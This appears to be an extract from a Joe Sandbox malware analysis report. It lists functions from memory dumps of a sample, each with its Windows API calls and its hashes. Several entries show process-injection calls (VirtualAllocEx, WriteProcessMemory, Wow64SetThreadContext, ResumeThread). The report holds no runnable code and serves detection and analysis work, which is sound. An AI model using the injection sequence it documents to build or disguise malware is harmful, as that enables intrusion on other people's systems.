Source File: 00000008.00000002.1786826618.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4c80000_NPadpxkCGKGoat.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 795a773c7e751756ff9bd72f5dfb48efa1e18f7729379eeda6589d11daf9598c
Instruction ID: 2e4957ac67f85bba40eeec8ef06ecc2abbbc5a2b5f6a87b450c1fda68766a29e
Opcode Fuzzy Hash: 795a773c7e751756ff9bd72f5dfb48efa1e18f7729379eeda6589d11daf9598c
Instruction Fuzzy Hash: 0B9124B4A007089FDB24DF69D480B9ABBF2FF48308F14892ED44AE7751D774A945CB94

Function 04C8CD44 Relevance: 1.7, APIs: 1, Instructions: 188COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 04C8CF11

Memory Dump Source

Source File: 00000008.00000002.1786826618.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4c80000_NPadpxkCGKGoat.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: a76aef7ee4d8cb5613d60216275098cc9b0d095e1cb63a0a3e7837b6f1b36f58
Instruction ID: db41dc265bda500f202376b6b9813635b3da28f2d55b9934747a5226f0c027dc
Opcode Fuzzy Hash: a76aef7ee4d8cb5613d60216275098cc9b0d095e1cb63a0a3e7837b6f1b36f58
Instruction Fuzzy Hash: 1D717BB4D01218DFDF20CFA9D984ADEBBB1BB49304F1491AAE818B7211D770AA85CF55

Function 04C8CD50 Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 04C8CF11

Memory Dump Source

Source File: 00000008.00000002.1786826618.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4c80000_NPadpxkCGKGoat.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: de0bec10d227bbce402fc45d29ff99021aa69fe188428838d7af64f16108069d
Instruction ID: 880a07979c898861c80d97b5198cd273f96582ed011462208c8eccdb231b134e
Opcode Fuzzy Hash: de0bec10d227bbce402fc45d29ff99021aa69fe188428838d7af64f16108069d
Instruction Fuzzy Hash: A1717BB4D00218DFDF20CFA9D984ADDFBB1BB49314F1491AAE818A7211D770AA85CF55

Function 097C2280 Relevance: 1.7, APIs: 1, Instructions: 151windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 097C2393

Memory Dump Source

Source File: 00000008.00000002.1789225298.00000000097C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_97c0000_NPadpxkCGKGoat.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 82749cbba0eb47eece41787effab54849d381c3bfa404363487a102249902340
Instruction ID: 72b460c75c349b526ad810ad9500145c1a1d1701b8eb57b5e5a1bc54fa49512c
Opcode Fuzzy Hash: 82749cbba0eb47eece41787effab54849d381c3bfa404363487a102249902340
Instruction Fuzzy Hash: F051DDB5D052589FCF01CFA9D880AEEBFB5EF0A310F14906AE924BB211C335A951DF64

Function 04C80604 Relevance: 1.6, APIs: 1, Instructions: 131COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 04C80701

Memory Dump Source

Source File: 00000008.00000002.1786826618.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4c80000_NPadpxkCGKGoat.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1afb85ab71485e5917bb4d74162e67bbdc9a8383cb2873676787357106a7d66e
Instruction ID: 4ac187eaef63e73f4c017f96dc0916575d15d9c920e56360f5552b505d87e596
Opcode Fuzzy Hash: 1afb85ab71485e5917bb4d74162e67bbdc9a8383cb2873676787357106a7d66e
Instruction Fuzzy Hash: CA51D6B1D00218DFDB20DFA9C941BDEBBF5EF49304F1080AAD509BB251DA756A89CF91

Function 04C80610 Relevance: 1.6, APIs: 1, Instructions: 123COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 04C80701

Memory Dump Source

Source File: 00000008.00000002.1786826618.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4c80000_NPadpxkCGKGoat.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 09a83200413910ac4a8125388811e8f23147877f7c338cdba41a2da053e70f1a
Instruction ID: a58bab17a7aad4149a1d962565602475f18d08bd60f0c8610a9c81c764b5d4e0
Opcode Fuzzy Hash: 09a83200413910ac4a8125388811e8f23147877f7c338cdba41a2da053e70f1a
Instruction Fuzzy Hash: 6A51C5B1D00218DFDB21DFA9C940B9EBBF5AF49304F1080AAD509BB251DA756A89CF91

Function 09B16AEA Relevance: 1.6, APIs: 1, Instructions: 117injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09B16BC3

Memory Dump Source

Source File: 00000008.00000002.1789450802.0000000009B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9b10000_NPadpxkCGKGoat.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d7f8bc0b4421115eb84913b76884d4e715d76116db72c006ebe2e519d0da1396
Instruction ID: 90906e97e305afa716eea2bb74cf656bb64b4490a24621ae3b7cdaddda52c2e8
Opcode Fuzzy Hash: d7f8bc0b4421115eb84913b76884d4e715d76116db72c006ebe2e519d0da1396
Instruction Fuzzy Hash: 6F4198B5D012589FCF00CFA9D985AEEBBF1BB49310F24902AE818B7210D379AA45CB54

Function 09B16AF0 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09B16BC3

Memory Dump Source

Source File: 00000008.00000002.1789450802.0000000009B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9b10000_NPadpxkCGKGoat.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: dc289b357bc0337709a02da22b89d43bf40e7aaa4003d6fe4e856ada841ad15b
Instruction ID: fa007d4827631a36d78c1b5beab809ca74d14c64e45a57c37230b2ef04c79c72
Opcode Fuzzy Hash: dc289b357bc0337709a02da22b89d43bf40e7aaa4003d6fe4e856ada841ad15b
Instruction Fuzzy Hash: 094198B5D01258DFCF00CFA9D984ADEFBF1BB49310F24942AE818B7250D779AA45CB64

Function 04C88698 Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04C8876B

Memory Dump Source

Source File: 00000008.00000002.1786826618.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4c80000_NPadpxkCGKGoat.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f23518272428c23ccf14167b5a5d15e58ebd1e69817819607ecc6b57848f257d
Instruction ID: c67d8a39da9bfa6089d335d26e9bdb1201fb19eb2a8d0be85e86d560d121a377
Opcode Fuzzy Hash: f23518272428c23ccf14167b5a5d15e58ebd1e69817819607ecc6b57848f257d
Instruction Fuzzy Hash: 7E4177B9D002589FCF00CFA9D984ADEBBF5BB09310F24902AE818BB310D335A955CF64

Function 04C886A0 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04C8876B

Memory Dump Source

Source File: 00000008.00000002.1786826618.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4c80000_NPadpxkCGKGoat.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 54aa9937ed8232a98faca5d991c8094372cc68c6431597f5582128b1fe2c0a05
Instruction ID: e3b192adafc976e18b50e78fcf3cdac28711e89a8d8e20586f387d096aff97eb
Opcode Fuzzy Hash: 54aa9937ed8232a98faca5d991c8094372cc68c6431597f5582128b1fe2c0a05
Instruction Fuzzy Hash: A24168B9D002589FCF00CFAAD984ADEBBF5BB09310F14902AE918BB310D335A945CF64

Function 09B16C40 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09B16CFA

Memory Dump Source

Source File: 00000008.00000002.1789450802.0000000009B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9b10000_NPadpxkCGKGoat.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: cccc777c6f32f3d4d07b61e82bb4e71eaa13f4e419d567be0f739b806cab71c8
Instruction ID: aa1c2422db1bedc47e8104f7aebe686d4f35ab70ed861164a41cbe1000e664c3
Opcode Fuzzy Hash: cccc777c6f32f3d4d07b61e82bb4e71eaa13f4e419d567be0f739b806cab71c8
Instruction Fuzzy Hash: BA4199B5D00258DFCF10CFA9D885AEEFBB1BB59320F14A02AE819B7250C775A945CF64

Function 09B16C48 Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09B16CFA

Memory Dump Source

Source File: 00000008.00000002.1789450802.0000000009B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9b10000_NPadpxkCGKGoat.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 22e3165291776f7ab3854d964ef510557f44c60bd09b4eadf4b6e4bdf14a587d
Instruction ID: 780083a62a2bee14add010f2aa970da2048df1a82f0047856939929f4b8c1270
Opcode Fuzzy Hash: 22e3165291776f7ab3854d964ef510557f44c60bd09b4eadf4b6e4bdf14a587d
Instruction Fuzzy Hash: 0D41ABB5D00258DFCF10CFA9D884ADEFBB5BB59320F14902AE818B7210C775A945CF64

Function 09B16590 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09B16642

Memory Dump Source

Source File: 00000008.00000002.1789450802.0000000009B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9b10000_NPadpxkCGKGoat.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5419b1f1856f62915329c840a14fabf895be0e405e8f9de25dd1af7074adc842
Instruction ID: 218e8f076d067b519ccdb372c9b35876a8ed2c68dc17e0f4942fcdae91ca1095
Opcode Fuzzy Hash: 5419b1f1856f62915329c840a14fabf895be0e405e8f9de25dd1af7074adc842
Instruction Fuzzy Hash: 323198B5D00258DFCF10CFA9D981ADEFBB5BB59320F14A42AE815B7210D735A902CF54

Function 09B16598 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09B16642

Memory Dump Source

Source File: 00000008.00000002.1789450802.0000000009B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9b10000_NPadpxkCGKGoat.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 85e495352b00c7a8e65d2d1090e89e13dac29e35aeb5de24d586d32ca95cf633
Instruction ID: fc001d088811ed8f2dc46b644d075f2a406c7ddea87e7bb98a366830bd0c8f43
Opcode Fuzzy Hash: 85e495352b00c7a8e65d2d1090e89e13dac29e35aeb5de24d586d32ca95cf633
Instruction Fuzzy Hash: 333188B5D00258DFCF10CFA9D981ADEFBB5BB59320F10A42AE815B7210D735A901CF55

Function 04C8C274 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04C8F581

Memory Dump Source

Source File: 00000008.00000002.1786826618.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4c80000_NPadpxkCGKGoat.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 146004fa88643e2dc2821aa7702a8748b18c7ff446baa3bcaf7ed055f3e835d5
Instruction ID: e1b8d50166c494a79262b8532f8a55c28aaafcae2decb98b7b352ca7953f2407
Opcode Fuzzy Hash: 146004fa88643e2dc2821aa7702a8748b18c7ff446baa3bcaf7ed055f3e835d5
Instruction Fuzzy Hash: 36412AB4900209CFDB14DF99C488AAABBF6FF88318F24C45DD519AB321D774E941CBA5

Function 09B16031 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 09B160E7

Memory Dump Source

Source File: 00000008.00000002.1789450802.0000000009B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9b10000_NPadpxkCGKGoat.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 5e07e541eb85675d9fc29e9896cdf5d571f98c9707564a18faaac584a2223118
Instruction ID: 9ba2203f2b7f319e5d36bd425b1d93cd20e151452818b987c7b8b1b45a739f7a
Opcode Fuzzy Hash: 5e07e541eb85675d9fc29e9896cdf5d571f98c9707564a18faaac584a2223118
Instruction Fuzzy Hash: 6141ABB5D00258DFCB14CFA9D885AEEBBF1BF49320F24902AE419B7250C779A945CF54

Function 02568398 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0256843F

Memory Dump Source

Source File: 00000008.00000002.1782604788.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2560000_NPadpxkCGKGoat.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 2b7b6642e62d2644cd374886f1032d1697b80ee41aacdfbd768690526c32b1ba
Instruction ID: 28869d520a566ee7badf113471a60414838a74be60a73f5d7158c5d200f1f5c6
Opcode Fuzzy Hash: 2b7b6642e62d2644cd374886f1032d1697b80ee41aacdfbd768690526c32b1ba
Instruction Fuzzy Hash: CE3199B9D002589FCB10CFA9D984AEEFBF5BB19314F24A02AE814B7310D375A945CF64

Function 09B16038 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 09B160E7

Memory Dump Source

Source File: 00000008.00000002.1789450802.0000000009B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9b10000_NPadpxkCGKGoat.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 3aee477491c3eff9c3e3f9d3acd53d2190944129f89edbee33ecb91e9b6ca7ac
Instruction ID: 79f2b2cba5d7cc9653aab35fade5ad6190ca6d04ba6dd5582c6b2204e7cead5b
Opcode Fuzzy Hash: 3aee477491c3eff9c3e3f9d3acd53d2190944129f89edbee33ecb91e9b6ca7ac
Instruction Fuzzy Hash: 8F31BAB5D00258DFCB14CFAAD885AEEFBF1BB49320F24902AE418B7240C779A945CF54

Function 09B14FF8 Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,00000000), ref: 09B1A713

Memory Dump Source

Source File: 00000008.00000002.1789450802.0000000009B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9b10000_NPadpxkCGKGoat.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8ae59589c70743f04d6b462984ef3cb8be5db86e8dacecc4de32e53178d1dba8
Instruction ID: 29d8a201b4de025e3c407098f9883c091abb0f8459e71ccea36083b588e8c479
Opcode Fuzzy Hash: 8ae59589c70743f04d6b462984ef3cb8be5db86e8dacecc4de32e53178d1dba8
Instruction Fuzzy Hash: DD3188B9D01248EFCB10CFA9D584A9EFBF5EB59320F24905AE818B7310D375A945CF64

Function 09B1A670 Relevance: 1.6, APIs: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,00000000), ref: 09B1A713

Memory Dump Source

Source File: 00000008.00000002.1789450802.0000000009B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9b10000_NPadpxkCGKGoat.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 86eb91b5287d7fe869e1c5b52969fa6c763806c7e966196e7dcb875fd2cf79ff
Instruction ID: 0df4a2bc7b1031c25223ce863ff39fcf9e2747e5fe619d635c1ba67887f36eef
Opcode Fuzzy Hash: 86eb91b5287d7fe869e1c5b52969fa6c763806c7e966196e7dcb875fd2cf79ff
Instruction Fuzzy Hash: 493188B9D012489FCB14CFA9D584ADEFBF5AB59310F24905AE818B7320D335A945CF54

Function 0256AD28 Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(?), ref: 0256ADC2

Memory Dump Source

Source File: 00000008.00000002.1782604788.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2560000_NPadpxkCGKGoat.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 3396d0976ab3b06bfd65b1011b0b20afeb80c1218dbab4329a16f09cb783a5ea
Instruction ID: 0bdeec5d0bdd122d476f2d77b55f2121fd6db3245faaeae0fe26648d6d369c87
Opcode Fuzzy Hash: 3396d0976ab3b06bfd65b1011b0b20afeb80c1218dbab4329a16f09cb783a5ea
Instruction Fuzzy Hash: 5831BAB4D002489FCB14CFA9D584ADEFBF5BB49314F14906AE818B7320D734A945CF64

Function 09B15F40 Relevance: 1.6, APIs: 1, Instructions: 77threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 09B15FC6

Memory Dump Source

Source File: 00000008.00000002.1789450802.0000000009B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9b10000_NPadpxkCGKGoat.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 7d2543027a9948510e901e0c9ec4df42633665d0f04f24cfbbba4f4ce2ed6581
Instruction ID: 3013218586e751fcc87994cd3968ebf2ff41bec54bad82f52866ac3ba5f8aa44
Opcode Fuzzy Hash: 7d2543027a9948510e901e0c9ec4df42633665d0f04f24cfbbba4f4ce2ed6581
Instruction Fuzzy Hash: 4B31DDB4D012189FCF14CFA9D885ADEFBB4AB99320F24946AE419B7310C775A901CF54

Function 04C86278 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(?), ref: 04C8630A

Memory Dump Source

Source File: 00000008.00000002.1786826618.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4c80000_NPadpxkCGKGoat.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9c99a5514d5ff20faa2c0e63280d1f92cf2e51f7cd5324c8d8d7dfc835c194f6
Instruction ID: d517bad09055e9142cdf791df2c04df5a87ee77115607b882d1122335d3adad9
Opcode Fuzzy Hash: 9c99a5514d5ff20faa2c0e63280d1f92cf2e51f7cd5324c8d8d7dfc835c194f6
Instruction Fuzzy Hash: D931A9B4D002199FCB14CFAAD984ADEFBF5AB48314F14906AE818B7320D334A946CF65

Function 09B15F48 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 09B15FC6

Memory Dump Source

Source File: 00000008.00000002.1789450802.0000000009B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9b10000_NPadpxkCGKGoat.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 2b575236e24d358c18261acf94de1db039223f06e411a9ae698130b728eed843
Instruction ID: 5d34c49b028b333f762489e95f3379711220b34358c891f283264783ee8fb977
Opcode Fuzzy Hash: 2b575236e24d358c18261acf94de1db039223f06e411a9ae698130b728eed843
Instruction Fuzzy Hash: 4731ACB4D012189FCF14CFA9D985A9EFBB5AF49320F14946AE819B7310C775A901CF54

Function 0256AE20 Relevance: 1.3, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0256AE9E

Memory Dump Source

Source File: 00000008.00000002.1782604788.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2560000_NPadpxkCGKGoat.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 9a8cf4150918064a67b6ad2a1b26e7afe7ee67e4050eade8adaabd951f478659
Instruction ID: a9a734f6c7c9911f32b81eea42419b109a6586e06ec5f9fe13f8a8d042f06abf
Opcode Fuzzy Hash: 9a8cf4150918064a67b6ad2a1b26e7afe7ee67e4050eade8adaabd951f478659
Instruction Fuzzy Hash: C5219BB5D002589FCB10CFA9D985AEEFBF4AB49324F24905AE918B3350C375A945CF64

Function 00A0D3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1781667877.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a0d000_NPadpxkCGKGoat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 734118c946f3310d9befc537105aff6a1b03bfbe54be9c567925fa25500c3654
Instruction ID: 0a9adf07964fa8d1fd63334fcf09f82be987d49fabe67e0abaf293022dc03d42
Opcode Fuzzy Hash: 734118c946f3310d9befc537105aff6a1b03bfbe54be9c567925fa25500c3654
Instruction Fuzzy Hash: 0F2107B2504208EFDB05DF94E9C0B26BF65FB94324F24C56DE9090B296C337E856DBA1

Function 00A0D4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1781667877.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a0d000_NPadpxkCGKGoat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00e57154e2d7f2716246f6a17a2130259ddf8bbd649ba8b48938f125ad970e91
Instruction ID: aa3580d12427ed1d4faaa1dbc073260c23b2ca861b7677eb6ff8c18eb66c3f21
Opcode Fuzzy Hash: 00e57154e2d7f2716246f6a17a2130259ddf8bbd649ba8b48938f125ad970e91
Instruction Fuzzy Hash: 522128B2504208DFCB05DF54E9C0B26BF65FB98328F248569ED090B296C336E856DBA1

Function 00C1D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1782290942.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c1d000_NPadpxkCGKGoat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 952cb804cad2096d59f7efda875a941b00e68d0d92ac58f330bc9a7946dc22ed
Instruction ID: b0ae327091d880437d09e7d29b309653879f17e702612b7d0b969ea6e9eb1321
Opcode Fuzzy Hash: 952cb804cad2096d59f7efda875a941b00e68d0d92ac58f330bc9a7946dc22ed
Instruction Fuzzy Hash: 282107B1504200EFDB05DF14D5C0B66BBA5FB85314F34C6ADE91A4B252C336DC86EA61

Function 00C1D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1782290942.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c1d000_NPadpxkCGKGoat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84f0acd4b910b2890bc55206c55dfd9cf1296ed6eacedcad0c05260fef265ce0
Instruction ID: 80991d08f5f6125d84d2ea27c037bdbf975f4c8617ab28d59e8475b3dec6e391
Opcode Fuzzy Hash: 84f0acd4b910b2890bc55206c55dfd9cf1296ed6eacedcad0c05260fef265ce0
Instruction Fuzzy Hash: 4721F575504200DFCB14DF14D9C0B66BB65FB89314F24C5ADE90A4B256C33AD887EA61

Function 00C1D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1782290942.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c1d000_NPadpxkCGKGoat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 377a53baa18bf06a1f324486076bbe1c96a2004cd8367ee1ca3cc0c52a357bbc
Instruction ID: e8b717f9dc73eea0a742715f1c658e2d909e3420be3d16ba2a925ecdc6d2cd62
Opcode Fuzzy Hash: 377a53baa18bf06a1f324486076bbe1c96a2004cd8367ee1ca3cc0c52a357bbc
Instruction Fuzzy Hash: 632180755093808FCB12CF24D990715BF71EB46314F28C5EAD8498B6A7C33A984ACB62

Function 00A0D3E7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1781667877.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a0d000_NPadpxkCGKGoat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction ID: 92d16846fe288890f9d2c749f10ba6ed63446071cce271d9e2b4eb68dad7e20e
Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction Fuzzy Hash: E7110372404244DFCB02CF40D9C0B16BF72FB94324F24C5A9D8090B656C33AE85ACBA1

Function 00A0D4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1781667877.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a0d000_NPadpxkCGKGoat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction ID: ef6b98c6d167f33c5344a8c75cb44d6567fe4bbc7b8aa891e0c4320d3d0b2446
Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction Fuzzy Hash: 7B112672404244CFCB12CF44E9C0B16BF72FB94328F24C2A9DC090B256C33AE85ACBA1

Function 00C1D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1782290942.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c1d000_NPadpxkCGKGoat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction ID: a9a45887a6ab236d365867590a8bbefeab71f43a59bad580533282ceff9af7d3
Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction Fuzzy Hash: 8611DD75504280DFCB12CF14C5C0B15FBB2FB85314F24C6AED85A4B696C33AD89ACB61

Function 00A0D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

